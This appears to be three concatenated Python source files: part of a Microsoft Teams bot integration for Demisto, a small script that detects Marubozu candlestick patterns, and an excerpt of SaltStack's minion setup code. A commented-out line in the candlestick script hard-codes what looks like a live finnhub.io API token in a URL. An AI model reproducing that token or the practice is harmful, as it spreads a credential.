bot_id = demisto.params().get('bot_id')
team: dict = channel_data.get('team', {})
team_id: str = team.get('id', '')
team_aad_id: str = team.get('aadGroupId', '')
team_name: str = team.get('name', '')
tenant: dict = channel_data.get('tenant', {})
tenant_id: str = tenant.get('id', '')
recipient: dict = request_body.get('recipient', {})
recipient_name: str = recipient.get('name', '')
members_added: list = request_body.get('membersAdded', [])
teams: list = json.loads(integration_context.get('teams', '[]'))
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
for member in members_added:
member_id = member.get('id', '')
if bot_id in member_id:
# The bot was added to a team, caching team ID and team members
demisto.info(f'The bot was added to team {team_name}')
integration_context['tenant_id'] = tenant_id
integration_context['bot_name'] = recipient_name
break
team_members: list = get_team_members(service_url, team_id)
found_team: bool = False
for team in teams:
if team.get('team_aad_id', '') == team_aad_id:
team['team_members'] = team_members
found_team = True
break
if not found_team:
        # Didn't find an existing team, adding a new team object
teams.append({
'team_aad_id': team_aad_id,
'team_id': team_id,
'team_name': team_name,
'team_members': team_members
})
integration_context['teams'] = json.dumps(teams)
demisto.setIntegrationContext(integration_context)
def direct_message_handler(integration_context: dict, request_body: dict, conversation: dict, message: str):
"""
Handles a direct message sent to the bot
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param conversation: Conversation object sent
:param message: The direct message sent
:return: None
"""
conversation_id: str = conversation.get('id', '')
from_property: dict = request_body.get('from', {})
user_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, user_id)
username: str = team_member.get('username', '')
user_email: str = team_member.get('user_email', '')
formatted_message: str = str()
attachment: dict = dict()
return_card: bool = False
allow_external_incidents_creation: bool = demisto.params().get('allow_external_incidents_creation', False)
lowered_message = message.lower()
if lowered_message.find('incident') != -1 and (lowered_message.find('create') != -1
or lowered_message.find('open') != -1
or lowered_message.find('new') != -1):
if user_email:
demisto_user = demisto.findUser(email=user_email)
else:
demisto_user = demisto.findUser(username=username)
if not demisto_user and not allow_external_incidents_creation:
data = 'You are not allowed to create incidents.'
else:
data = process_incident_create_message(demisto_user, message)
formatted_message = urlify_hyperlinks(data)
else:
try:
data = demisto.directMessage(message, username, user_email, allow_external_incidents_creation)
return_card = True
if data.startswith('`'): # We got a list of incidents/tasks:
data_by_line: list = data.replace('```', '').strip().split('\n')
return_card = True
if data_by_line[0].startswith('Task'):
attachment = process_tasks_list(data_by_line)
else:
attachment = process_incidents_list(data_by_line)
else: # Mirror investigation command / unknown direct message
attachment = process_mirror_or_unknown_message(data)
except Exception as e:
data = str(e)
if return_card:
conversation = {
'type': 'message',
'attachments': [attachment]
}
else:
formatted_message = formatted_message or data
conversation = {
'type': 'message',
'text': formatted_message
}
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
send_message_request(service_url, conversation_id, conversation)
def entitlement_handler(integration_context: dict, request_body: dict, value: dict, conversation_id: str):
"""
Handles activity the bot received as part of TeamsAsk flow, which includes entitlement
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
    :param value: Object which includes the user response, entitlement, investigation ID and task ID
:param conversation_id: Message conversation ID
:return: None
"""
response: str = value.get('response', '')
entitlement_guid: str = value.get('entitlement', '')
investigation_id: str = value.get('investigation_id', '')
task_id: str = value.get('task_id', '')
from_property: dict = request_body.get('from', {})
team_members_id: str = from_property.get('id', '')
team_member: dict = get_team_member(integration_context, team_members_id)
demisto.handleEntitlementForUser(
incidentID=investigation_id,
guid=entitlement_guid,
taskID=task_id,
email=team_member.get('user_email', ''),
content=response
)
activity_id: str = request_body.get('replyToId', '')
service_url: str = integration_context.get('service_url', '')
if not service_url:
raise ValueError('Did not find service URL. Try messaging the bot on Microsoft Teams')
update_message(service_url, conversation_id, activity_id, 'Your response was submitted successfully.')
def message_handler(integration_context: dict, request_body: dict, channel_data: dict, message: str):
"""
Handles a message in which the bot was mentioned
:param integration_context: Cached object to retrieve relevant data from
:param request_body: Activity payload
:param channel_data: Microsoft Teams tenant, team and channel details
:param message: The message which was sent mentioning the bot
:return: None
"""
channel: dict = channel_data.get('channel', {})
channel_id: str = channel.get('id', '')
team_id: str = channel_data.get('team', {}).get('id', '')
from_property: dict = request_body.get('from', {})
team_member_id: str = from_property.get('id', '')
if integration_context.get('teams'):
teams: list = json.loads(integration_context['teams'])
for team in teams:
if team.get('team_id', '') == team_id:
mirrored_channels: list = team.get('mirrored_channels', [])
for mirrored_channel in mirrored_channels:
if mirrored_channel.get('channel_id') == channel_id:
if mirrored_channel.get('mirror_direction', '') != 'FromDemisto' \
and 'none' not in mirrored_channel.get('mirror_type', ''):
investigation_id: str = mirrored_channel.get('investigation_id', '')
username: str = from_property.get('name', '')
                            user_email: str = get_team_member(integration_context, team_member_id).get('user_email', '')
demisto.addEntry(
id=investigation_id,
entry=message,
username=username,
email=user_email,
footer=f'\n**{ENTRY_FOOTER}**'
)
return
@APP.route('/', methods=['POST'])
def messages() -> Response:
"""
Main handler for messages sent to the bot
"""
headers: dict = cast(Dict[Any, Any], request.headers)
if validate_auth_header(headers) is False:
demisto.info(f'Authorization header failed: {str(headers)}')
else:
request_body: dict = request.json
integration_context: dict = demisto.getIntegrationContext()
service_url: str = request_body.get('serviceUrl', '')
if service_url:
service_url = service_url[:-1] if service_url.endswith('/') else service_url
integration_context['service_url'] = service_url
demisto.setIntegrationContext(integration_context)
channel_data: dict = request_body.get('channelData', {})
event_type: str = channel_data.get('eventType', '')
conversation: dict = request_body.get('conversation', {})
conversation_type: str = conversation.get('conversationType', '')
conversation_id: str = conversation.get('id', '')
message_text: str = request_body.get('text', '')
# Remove bot mention
bot_name = integration_context.get('bot_name', '')
formatted_message: str = message_text.replace(f'<at>{bot_name}</at>', '')
value: dict = request_body.get('value', {})
if event_type == 'teamMemberAdded':
demisto.info('New Microsoft Teams team member was added')
member_added_handler(integration_context, request_body, channel_data)
elif value:
# In TeamsAsk process
demisto.info('Got response from user in MicrosoftTeamsAsk process')
entitlement_handler(integration_context, request_body, value, conversation_id)
elif conversation_type == 'personal':
demisto.info('Got direct message to the bot')
direct_message_handler(integration_context, request_body, conversation, formatted_message)
else:
demisto.info('Got message mentioning the bot')
message_handler(integration_context, request_body, channel_data, formatted_message)
demisto.info('Finished processing Microsoft Teams activity successfully')
demisto.updateModuleHealth('')
return Response(status=200)
def long_running_loop():
"""
The infinite loop which runs the mirror loop and the bot app in two different threads
"""
certificate: str = demisto.params().get('certificate', '')
private_key: str = demisto.params().get('key', '')
certificate_path = str()
private_key_path = str()
try:
port_mapping: str = PARAMS.get('longRunningPort', '')
port: int
if port_mapping:
if ':' in port_mapping:
port = int(port_mapping.split(':')[1])
else:
port = int(port_mapping)
else:
raise ValueError('No port mapping was provided')
Thread(target=channel_mirror_loop, daemon=True).start()
demisto.info('Started channel mirror loop thread')
ssl_args = dict()
if certificate and private_key:
certificate_file = NamedTemporaryFile(delete=False)
certificate_path = certificate_file.name
certificate_file.write(bytes(certificate, 'utf-8'))
certificate_file.close()
ssl_args['certfile'] = certificate_path
private_key_file = NamedTemporaryFile(delete=False)
private_key_path = private_key_file.name
private_key_file.write(bytes(private_key, 'utf-8'))
private_key_file.close()
ssl_args['keyfile'] = private_key_path
demisto.info('Starting HTTPS Server')
else:
demisto.info('Starting HTTP Server')
server = WSGIServer(('', port), APP, **ssl_args)
server.serve_forever()
except Exception as e:
if certificate_path:
os.unlink(certificate_path)
if private_key_path:
os.unlink(private_key_path)
demisto.error(f'An error occurred in long running loop: {str(e)}')
raise ValueError(str(e))
def test_module():
"""
Tests token retrieval for Bot Framework API
"""
get_bot_access_token()
demisto.results('ok')
def main():
""" COMMANDS MANAGER / SWITCH PANEL """
commands: dict = {
'test-module': test_module,
'long-running-execution': long_running_loop,
'send-notification': send_message,
'mirror-investigation': mirror_investigation,
'close-channel': close_channel,
'microsoft-teams-integration-health': integration_health
# 'microsoft-teams-create-team': create_team,
# 'microsoft-teams-send-file': send_file,
}
''' EXECUTION '''
try:
handle_proxy()
command: str = demisto.command()
LOG(f'Command being called is {command}')
if command in commands.keys():
commands[command]()
# Log exceptions
except Exception as e:
if command == 'long-running-execution':
LOG(str(e))
LOG.print_log()
demisto.updateModuleHealth(str(e))
else:
return_error(str(e))
if __name__ == 'builtins':
main()
|
marabuzo.py
|
## final code for Marubozu recognition
# import threading
# import pandas as pd
# from queue import Queue
# import time
# file = open("stock_pred.txt", "w")
# data = pd.read_csv("C:\\Users\\BEST BUY\\Desktop\\NASDAQ_20200331.csv")
# symbols = data.iloc[:,0:1].values
# th = Queue(maxsize = 4000)
def marabuzo(arg):
# print(i[0])
# string = 'https://finnhub.io/api/v1/stock/candle?symbol='+ i[0] +'&resolution=D&count=1&token=bq24qknrh5rc5ioodhhg'
# r = requests.get(string)
# print(r.content)
# if (str(r.headers.get('content-type'))) != "application/json; charset=utf-8":
# print("-----------------")
# th.put(threading.Thread(target=net_work, args = [i]))
# return
c = arg['close']
h = arg['high']
l = arg['low']
o = arg['open']
    # Returns 2 for a bullish Marubozu, 0 for a bearish Marubozu, 1 otherwise.
    if c > o:
        # Bullish candle: both shadows must be tiny relative to price and to the candle body
        if ((((h-c)/c)*100) <= 0.5 and (((o-l)/o)*100) <= 0.5 and ((h-c)/(c-o)*100) <= 5 and ((o-l)/(c-o)*100) <= 5):
            return 2
# print("bullish Marabozu at " + str(i[0]))
# file.write("bullish Marabozu at " + str(i[0])+ "\n" + " c = " + str(c) + " h = " + str(h)+ " o= " + str(o)+ " l = " + str(l) + "\n\n")
    elif c < o:
        # Bearish candle: same shadow constraints, measured against the bearish body
        if ((((h-o)/o)*100) <= 0.5 and (((c-l)/c)*100) <= 0.5 and ((h-o)/(o-c)*100) <= 5 and ((c-l)/(o-c)*100) <= 5):
            return 0
# print("bearish Marabozu at " + str(i[0]))
# file.write("bearish Marabozu at " + str(i[0])+ "\n" + " c = " + str(c) + " h = " + str(h)+ " o= " + str(o) + " l = " + str(l) + "\n\n")
    return 1
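# Minimal usage sketch (hypothetical OHLC values, not taken from the original data feed):
if __name__ == '__main__':
    sample_bar = {'open': 100.0, 'high': 110.05, 'low': 99.96, 'close': 110.0}
    label = marabuzo(sample_bar)
    print({2: 'bullish Marubozu', 0: 'bearish Marubozu', 1: 'no Marubozu'}[label])  # -> bullish Marubozu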
|
minion.py
|
# -*- coding: utf-8 -*-
'''
Routines to set up a minion
'''
# Import python libs
from __future__ import absolute_import, print_function, with_statement
import os
import re
import sys
import copy
import time
import types
import signal
import fnmatch
import logging
import threading
import traceback
import contextlib
import multiprocessing
from random import randint, shuffle
from stat import S_IMODE
# Import Salt Libs
# pylint: disable=import-error,no-name-in-module,redefined-builtin
import salt.ext.six as six
if six.PY3:
import ipaddress
else:
import salt.ext.ipaddress as ipaddress
from salt.ext.six.moves import range
# pylint: enable=no-name-in-module,redefined-builtin
# Import third party libs
try:
import zmq
# TODO: cleanup
import zmq.eventloop.ioloop
# support pyzmq 13.0.x, TODO: remove once we force people to 14.0.x
if not hasattr(zmq.eventloop.ioloop, 'ZMQIOLoop'):
zmq.eventloop.ioloop.ZMQIOLoop = zmq.eventloop.ioloop.IOLoop
LOOP_CLASS = zmq.eventloop.ioloop.ZMQIOLoop
HAS_ZMQ = True
except ImportError:
import tornado.ioloop
LOOP_CLASS = tornado.ioloop.IOLoop
HAS_ZMQ = False
HAS_RANGE = False
try:
import seco.range
HAS_RANGE = True
except ImportError:
pass
HAS_PSUTIL = False
try:
import salt.utils.psutil_compat as psutil
HAS_PSUTIL = True
except ImportError:
pass
HAS_RESOURCE = False
try:
import resource
HAS_RESOURCE = True
except ImportError:
pass
try:
import zmq.utils.monitor
HAS_ZMQ_MONITOR = True
except ImportError:
HAS_ZMQ_MONITOR = False
# pylint: enable=import-error
# Import salt libs
import salt
import salt.client
import salt.crypt
import salt.loader
import salt.beacons
import salt.engines
import salt.payload
import salt.syspaths
import salt.utils
import salt.utils.dictupdate
import salt.utils.context
import salt.utils.jid
import salt.pillar
import salt.utils.args
import salt.utils.event
import salt.utils.minion
import salt.utils.minions
import salt.utils.schedule
import salt.utils.error
import salt.utils.zeromq
import salt.defaults.exitcodes
import salt.cli.daemons
import salt.log.setup
from salt.config import DEFAULT_MINION_OPTS
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.executors import FUNCTION_EXECUTORS
from salt.utils.debug import enable_sigusr1_handler
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
from salt.utils.process import (default_signals,
SignalHandlingMultiprocessingProcess,
ProcessManager)
from salt.exceptions import (
CommandExecutionError,
CommandNotFoundError,
SaltInvocationError,
SaltReqTimeoutError,
SaltClientError,
SaltSystemExit,
SaltDaemonNotRunning,
SaltException,
)
import tornado.gen # pylint: disable=F0401
import tornado.ioloop # pylint: disable=F0401
log = logging.getLogger(__name__)
# To set up a minion:
# 1. Read in the configuration
# 2. Generate the function mapping dict
# 3. Authenticate with the master
# 4. Store the AES key
# 5. Connect to the publisher
# 6. Handle publications
def resolve_dns(opts, fallback=True):
'''
Resolves the master_ip and master_uri options
'''
ret = {}
check_dns = True
if (opts.get('file_client', 'remote') == 'local' and
not opts.get('use_master_when_local', False)):
check_dns = False
if check_dns is True:
# Because I import salt.log below I need to re-import salt.utils here
import salt.utils
try:
if opts['master'] == '':
raise SaltSystemExit
ret['master_ip'] = \
salt.utils.dns_check(opts['master'], True, opts['ipv6'])
except SaltClientError:
if opts['retry_dns']:
while True:
import salt.log
msg = ('Master hostname: \'{0}\' not found. Retrying in {1} '
'seconds').format(opts['master'], opts['retry_dns'])
if salt.log.setup.is_console_configured():
log.error(msg)
else:
print('WARNING: {0}'.format(msg))
time.sleep(opts['retry_dns'])
try:
ret['master_ip'] = salt.utils.dns_check(
opts['master'], True, opts['ipv6']
)
break
except SaltClientError:
pass
else:
if fallback:
ret['master_ip'] = '127.0.0.1'
else:
raise
except SaltSystemExit:
unknown_str = 'unknown address'
master = opts.get('master', unknown_str)
if master == '':
master = unknown_str
if opts.get('__role') == 'syndic':
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'syndic_master\' value in minion config.'.format(master)
            else:
                err = 'Master address: \'{0}\' could not be resolved. Invalid or unresolvable address. Set \'master\' value in minion config.'.format(master)
log.error(err)
raise SaltSystemExit(code=42, msg=err)
else:
ret['master_ip'] = '127.0.0.1'
if 'master_ip' in ret and 'master_ip' in opts:
if ret['master_ip'] != opts['master_ip']:
log.warning('Master ip address changed from {0} to {1}'.format(opts['master_ip'],
ret['master_ip'])
)
ret['master_uri'] = 'tcp://{ip}:{port}'.format(ip=ret['master_ip'],
port=opts['master_port'])
return ret
def prep_ip_port(opts):
ret = {}
if opts['master_uri_format'] == 'ip_only':
ret['master'] = opts['master']
else:
ip_port = opts['master'].rsplit(":", 1)
if len(ip_port) == 1:
# e.g. master: mysaltmaster
ret['master'] = ip_port[0]
else:
# e.g. master: localhost:1234
# e.g. master: 127.0.0.1:1234
# e.g. master: ::1:1234
ret['master'] = ip_port[0]
ret['master_port'] = ip_port[1]
return ret
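# Illustrative examples (hypothetical opts; any master_uri_format other than 'ip_only' splits host:port):
#   {'master': 'mysaltmaster', ...}   -> {'master': 'mysaltmaster'}
#   {'master': '127.0.0.1:4506', ...} -> {'master': '127.0.0.1', 'master_port': '4506'}
# With master_uri_format == 'ip_only', the 'master' value is passed through unchanged.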
def get_proc_dir(cachedir, **kwargs):
'''
Given the cache directory, return the directory that process data is
stored in, creating it if it doesn't exist.
The following optional Keyword Arguments are handled:
mode: which is anything os.makedir would accept as mode.
uid: the uid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
uid. Must be int. Works only on unix/unix like systems.
gid: the gid to set, if not set, or it is None or -1 no changes are
made. Same applies if the directory is already owned by this
gid. Must be int. Works only on unix/unix like systems.
'''
fn_ = os.path.join(cachedir, 'proc')
mode = kwargs.pop('mode', None)
if mode is None:
mode = {}
else:
mode = {'mode': mode}
if not os.path.isdir(fn_):
# proc_dir is not present, create it with mode settings
os.makedirs(fn_, **mode)
d_stat = os.stat(fn_)
# if mode is not an empty dict then we have an explicit
# dir mode. So lets check if mode needs to be changed.
if mode:
mode_part = S_IMODE(d_stat.st_mode)
if mode_part != mode['mode']:
os.chmod(fn_, (d_stat.st_mode ^ mode_part) | mode['mode'])
if hasattr(os, 'chown'):
# only on unix/unix like systems
uid = kwargs.pop('uid', -1)
gid = kwargs.pop('gid', -1)
# if uid and gid are both -1 then go ahead with
# no changes at all
if (d_stat.st_uid != uid or d_stat.st_gid != gid) and \
[i for i in (uid, gid) if i != -1]:
os.chown(fn_, uid, gid)
return fn_
def load_args_and_kwargs(func, args, data=None, ignore_invalid=False):
'''
Detect the args and kwargs that need to be passed to a function call, and
check them against what was passed.
'''
argspec = salt.utils.args.get_function_argspec(func)
_args = []
_kwargs = {}
invalid_kwargs = []
for arg in args:
if isinstance(arg, six.string_types):
string_arg, string_kwarg = salt.utils.args.parse_input([arg], condition=False) # pylint: disable=W0632
if string_arg:
# Don't append the version that was just derived from parse_cli
# above, that would result in a 2nd call to
# salt.utils.cli.yamlify_arg(), which could mangle the input.
_args.append(arg)
elif string_kwarg:
salt.utils.warn_until(
'Nitrogen',
'The list of function args and kwargs should be parsed '
'by salt.utils.args.parse_input() before calling '
'salt.minion.load_args_and_kwargs().'
)
if argspec.keywords or next(six.iterkeys(string_kwarg)) in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs.update(string_kwarg)
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
for key, val in six.iteritems(string_kwarg):
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
# if the arg is a dict with __kwarg__ == True, then its a kwarg
elif isinstance(arg, dict) and arg.pop('__kwarg__', False) is True:
for key, val in six.iteritems(arg):
if argspec.keywords or key in argspec.args:
# Function supports **kwargs or is a positional argument to
# the function.
_kwargs[key] = val
else:
# **kwargs not in argspec and parsed argument name not in
# list of positional arguments. This keyword argument is
# invalid.
invalid_kwargs.append('{0}={1}'.format(key, val))
continue
else:
_args.append(arg)
if invalid_kwargs and not ignore_invalid:
salt.utils.invalid_kwargs(invalid_kwargs)
if argspec.keywords and isinstance(data, dict):
# this function accepts **kwargs, pack in the publish data
for key, val in six.iteritems(data):
_kwargs['__pub_{0}'.format(key)] = val
return _args, _kwargs
def eval_master_func(opts):
'''
Evaluate master function if master type is 'func'
and save it result in opts['master']
'''
if '__master_func_evaluated' not in opts:
# split module and function and try loading the module
mod_fun = opts['master']
mod, fun = mod_fun.split('.')
try:
master_mod = salt.loader.raw_mod(opts, mod, fun)
if not master_mod:
raise KeyError
# we take whatever the module returns as master address
opts['master'] = master_mod[mod_fun]()
if not isinstance(opts['master'], str):
raise TypeError
opts['__master_func_evaluated'] = True
except KeyError:
log.error('Failed to load module {0}'.format(mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
except TypeError:
log.error('{0} returned from {1} is not a string'.format(opts['master'], mod_fun))
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
log.info('Evaluated master from module: {0}'.format(mod_fun))
def master_event(type, master=None):
'''
Centralized master event function which will return event type based on event_map
'''
event_map = {'connected': '__master_connected',
'disconnected': '__master_disconnected',
'failback': '__master_failback',
'alive': '__master_alive'}
if type == 'alive' and master is not None:
return '{0}_{1}'.format(event_map.get(type), master)
return event_map.get(type, None)
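# Illustrative examples (hypothetical master ID):
#   master_event('connected')          -> '__master_connected'
#   master_event('alive', 'master01')  -> '__master_alive_master01'
#   master_event('unknown')            -> None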
class MinionBase(object):
def __init__(self, opts):
self.opts = opts
@staticmethod
def process_schedule(minion, loop_interval):
try:
if hasattr(minion, 'schedule'):
minion.schedule.eval()
else:
log.error('Minion scheduler not initialized. Scheduled jobs will not be run.')
return
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if minion.schedule.loop_interval < loop_interval:
loop_interval = minion.schedule.loop_interval
log.debug(
'Overriding loop_interval because of scheduled jobs.'
)
except Exception as exc:
log.error(
'Exception {0} occurred in scheduled job'.format(exc)
)
return loop_interval
def process_beacons(self, functions):
'''
Evaluate all of the configured beacons, grab the config again in case
the pillar or grains changed
'''
if 'config.merge' in functions:
b_conf = functions['config.merge']('beacons', self.opts['beacons'], omit_opts=True)
if b_conf:
return self.beacons.process(b_conf, self.opts['grains']) # pylint: disable=no-member
return []
@tornado.gen.coroutine
def eval_master(self,
opts,
timeout=60,
safe=True,
failed=False,
failback=False):
'''
Evaluates and returns a tuple of the current master address and the pub_channel.
In standard mode, just creates a pub_channel with the given master address.
With master_type=func evaluates the current master address from the given
module and then creates a pub_channel.
With master_type=failover takes the list of masters and loops through them.
The first one that allows the minion to create a pub_channel is then
returned. If this function is called outside the minions initialization
phase (for example from the minions main event-loop when a master connection
loss was detected), 'failed' should be set to True. The current
(possibly failed) master will then be removed from the list of masters.
'''
# return early if we are not connecting to a master
if opts['master_type'] == 'disable':
log.warning('Master is set to disable, skipping connection')
self.connected = False
raise tornado.gen.Return((None, None))
# check if master_type was altered from its default
elif opts['master_type'] != 'str' and opts['__role'] != 'syndic':
# check for a valid keyword
if opts['master_type'] == 'func':
eval_master_func(opts)
# if failover is set, master has to be of type list
elif opts['master_type'] == 'failover':
if isinstance(opts['master'], list):
log.info('Got list of available master addresses:'
' {0}'.format(opts['master']))
if opts['master_shuffle']:
if opts['master_failback']:
secondary_masters = opts['master'][1:]
shuffle(secondary_masters)
opts['master'][1:] = secondary_masters
else:
shuffle(opts['master'])
opts['auth_tries'] = 0
if opts['master_failback'] and opts['master_failback_interval'] == 0:
opts['master_failback_interval'] = opts['master_alive_interval']
# if opts['master'] is a str and we have never created opts['master_list']
elif isinstance(opts['master'], str) and ('master_list' not in opts):
# We have a string, but a list was what was intended. Convert.
# See issue 23611 for details
opts['master'] = [opts['master']]
elif opts['__role'] == 'syndic':
log.info('Syndic setting master_syndic to \'{0}\''.format(opts['master']))
# if failed=True, the minion was previously connected
# we're probably called from the minions main-event-loop
# because a master connection loss was detected. remove
# the possibly failed master from the list of masters.
elif failed:
if failback:
# failback list of masters to original config
opts['master'] = opts['master_list']
else:
log.info('Moving possibly failed master {0} to the end of'
' the list of masters'.format(opts['master']))
if opts['master'] in opts['local_masters']:
# create new list of master with the possibly failed
# one moved to the end
failed_master = opts['master']
opts['master'] = [x for x in opts['local_masters'] if opts['master'] != x]
opts['master'].append(failed_master)
else:
opts['master'] = opts['master_list']
else:
msg = ('master_type set to \'failover\' but \'master\' '
'is not of type list but of type '
'{0}'.format(type(opts['master'])))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
                # If failover is set, the minion has to fail over on DNS errors instead of retrying DNS resolution.
# See issue 21082 for details
if opts['retry_dns']:
msg = ('\'master_type\' set to \'failover\' but \'retry_dns\' is not 0. '
'Setting \'retry_dns\' to 0 to failover to the next master on DNS errors.')
log.critical(msg)
opts['retry_dns'] = 0
else:
msg = ('Invalid keyword \'{0}\' for variable '
'\'master_type\''.format(opts['master_type']))
log.error(msg)
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
# FIXME: if SMinion doesn't define io_loop, it can't switch master; see #29088
# Specify kwargs for the channel factory so that SMinion doesn't need to define an io_loop
# (The channel factories will set a default if the kwarg isn't passed)
factory_kwargs = {'timeout': timeout, 'safe': safe}
if getattr(self, 'io_loop', None):
factory_kwargs['io_loop'] = self.io_loop # pylint: disable=no-member
tries = opts.get('master_tries', 1)
attempts = 0
resolve_dns_fallback = opts.get('resolve_dns_fallback', False)
# if we have a list of masters, loop through them and be
# happy with the first one that allows us to connect
if isinstance(opts['master'], list):
conn = False
# shuffle the masters and then loop through them
opts['local_masters'] = copy.copy(opts['master'])
if opts['random_master']:
shuffle(opts['local_masters'])
last_exc = None
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
for master in opts['local_masters']:
opts['master'] = master
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
except SaltClientError as exc:
last_exc = exc
msg = ('Master hostname: \'{0}\' not found. Trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
# on first run, update self.opts with the whole master list
# to enable a minion to re-use old masters if they get fixed
if 'master_list' not in opts:
opts['master_list'] = copy.copy(opts['local_masters'])
self.opts = opts
try:
pub_channel = salt.transport.client.AsyncPubChannel.factory(opts, **factory_kwargs)
yield pub_channel.connect()
conn = True
break
except SaltClientError as exc:
last_exc = exc
msg = ('Master {0} could not be reached, trying '
'next master (if any)'.format(opts['master']))
log.info(msg)
continue
if not conn:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
self.opts['master'] = copy.copy(self.opts['local_masters'])
msg = ('No master could be reached or all masters '
'denied the minion\'s connection attempt.')
log.error(msg)
# If the code reaches this point, 'last_exc'
# should already be set.
raise last_exc # pylint: disable=E0702
else:
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
# single master sign in
else:
if opts['random_master']:
log.warning('random_master is True but there is only one master specified. Ignoring.')
while True:
attempts += 1
if tries > 0:
log.debug('Connecting to master. Attempt {0} '
'of {1}'.format(attempts, tries)
)
else:
log.debug('Connecting to master. Attempt {0} '
'(infinite attempts)'.format(attempts)
)
opts.update(prep_ip_port(opts))
try:
opts.update(resolve_dns(opts, fallback=resolve_dns_fallback))
if self.opts['transport'] == 'detect':
self.opts['detect_mode'] = True
for trans in ('zeromq', 'tcp'):
if trans == 'zeromq' and not HAS_ZMQ:
continue
self.opts['transport'] = trans
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
if not pub_channel.auth.authenticated:
continue
del self.opts['detect_mode']
break
else:
pub_channel = salt.transport.client.AsyncPubChannel.factory(self.opts, **factory_kwargs)
yield pub_channel.connect()
self.tok = pub_channel.auth.gen_token('salt')
self.connected = True
raise tornado.gen.Return((opts['master'], pub_channel))
except SaltClientError as exc:
if attempts == tries:
# Exhausted all attempts. Return exception.
self.connected = False
raise exc
class SMinion(MinionBase):
'''
Create an object that has loaded all of the minion module functions,
grains, modules, returners etc. The SMinion allows developers to
generate all of the salt minion functions and present them with these
functions for general use.
'''
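# Minimal usage sketch (illustrative only; the config path and function name
# are assumptions, not taken from this file):
#
#   import salt.config
#   opts = salt.config.minion_config('/etc/salt/minion')
#   sminion = SMinion(opts)
#   sminion.functions['test.ping']()
#
# SMinion loads grains, modules, returners, etc. eagerly in __init__, so it
# suits one-shot scripting use rather than a long-running daemon.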
def __init__(self, opts):
# Late setup of the opts grains, so we can log from the grains module
opts['grains'] = salt.loader.grains(opts)
super(SMinion, self).__init__(opts)
# Clean out the proc directory (default /var/cache/salt/minion/proc)
if (self.opts.get('file_client', 'remote') == 'remote'
or self.opts.get('use_master_when_local', False)):
if self.opts['transport'] == 'zeromq' and HAS_ZMQ:
io_loop = zmq.eventloop.ioloop.ZMQIOLoop()
else:
io_loop = LOOP_CLASS.current()
io_loop.run_sync(
lambda: self.eval_master(self.opts, failed=True)
)
self.gen_modules(initial_load=True)
# If configured, cache pillar data on the minion
if self.opts['file_client'] == 'remote' and self.opts.get('minion_pillar_cache', False):
import yaml
pdir = os.path.join(self.opts['cachedir'], 'pillar')
if not os.path.isdir(pdir):
os.makedirs(pdir, 0o700)
ptop = os.path.join(pdir, 'top.sls')
if self.opts['environment'] is not None:
penv = self.opts['environment']
else:
penv = 'base'
cache_top = {penv: {self.opts['id']: ['cache']}}
with salt.utils.fopen(ptop, 'wb') as fp_:
fp_.write(yaml.dump(cache_top))
os.chmod(ptop, 0o600)
cache_sls = os.path.join(pdir, 'cache.sls')
with salt.utils.fopen(cache_sls, 'wb') as fp_:
fp_.write(yaml.dump(self.opts['pillar']))
os.chmod(cache_sls, 0o600)
def gen_modules(self, initial_load=False):
'''
Load all of the modules for the minion
'''
self.utils = salt.loader.utils(self.opts)
self.functions = salt.loader.minion_mods(self.opts, utils=self.utils,
include_errors=True)
self.serializers = salt.loader.serializers(self.opts)
self.returners = salt.loader.returners(self.opts, self.functions)
self.proxy = salt.loader.proxy(self.opts, self.functions, self.returners, None)
# TODO: remove
self.function_errors = {} # Keep the funcs clean
self.states = salt.loader.states(self.opts,
self.functions,
self.utils,
self.serializers)
self.rend = salt.loader.render(self.opts, self.functions)
self.matcher = Matcher(self.opts, self.functions)
self.functions['sys.reload_modules'] = self.gen_modules
self.executors = salt.loader.executors(self.opts)
if self.opts.get('master_type') != 'disable':
self.opts['pillar'] = salt.pillar.get_pillar(
self.opts,
self.opts['grains'],
self.opts['id'],
self.opts['environment'],
pillarenv=self.opts.get('pillarenv'),
funcs=self.functions,
rend=self.rend,
).compile_pillar()
class MasterMinion(object):
'''
Create a fully loaded minion function object for generic use on the
master. What makes this class different is that the pillar is
omitted, otherwise everything else is loaded cleanly.
'''
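# Usage sketch (illustrative; the opts source and function name are
# assumptions). Master-side code passes its own opts, which must carry
# 'conf_file' so the minion config can be merged in:
#
#   mminion = MasterMinion(master_opts)
#   mminion.functions['sys.list_modules']()
#
# Note that pillar is deliberately left empty here (see __init__ below).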
def __init__(
self,
opts,
returners=True,
states=True,
rend=True,
matcher=True,
whitelist=None,
ignore_config_errors=True):
self.opts = salt.config.minion_config(opts['conf_file'], ignore_config_errors=ignore_config_errors)
self.opts.update(opts)
self.whitelist = whitelist
self.opts['grains'] = salt.loader.grains(opts)
self.opts['pillar'] = {}
self.mk_returners = returners
self.mk_states = states
self.mk_rend = rend
self.mk_matcher = matcher
